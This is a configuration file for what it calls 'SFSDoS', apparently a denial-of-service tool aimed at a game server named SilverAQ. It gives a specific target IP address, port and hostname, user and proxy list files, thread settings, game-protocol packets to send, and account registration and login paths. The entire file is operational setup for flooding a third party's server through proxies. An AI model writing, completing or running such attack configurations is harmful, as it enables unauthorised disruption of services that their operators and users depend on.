#SFSDoS Configuration for SilverAQ
remote.address=192.99.207.88
remote.port=5588
remote.host=www.silveraq.net
factory.users.list=users.txt
factory.proxies.list=proxies.txt
factory.proxies=true
factory.connections=true
factory.users=true
factory.threads=2
proxy.address=
proxy.port=
packets.1=%xt%zm%cmd%1%timisalegend%312jxda%yulgar%
packets.2=%xt%zm%cmd%1%timisalegend%312jxda%ewbie%
packets.3=%xt%zm%cmd%1%timisalegend%312jxda%battleon%
packets.4=%xt%zm%retrieveInventory%966%303%
packets.5=
link.register=/zhuce.php?ran=1337
link.login=/login


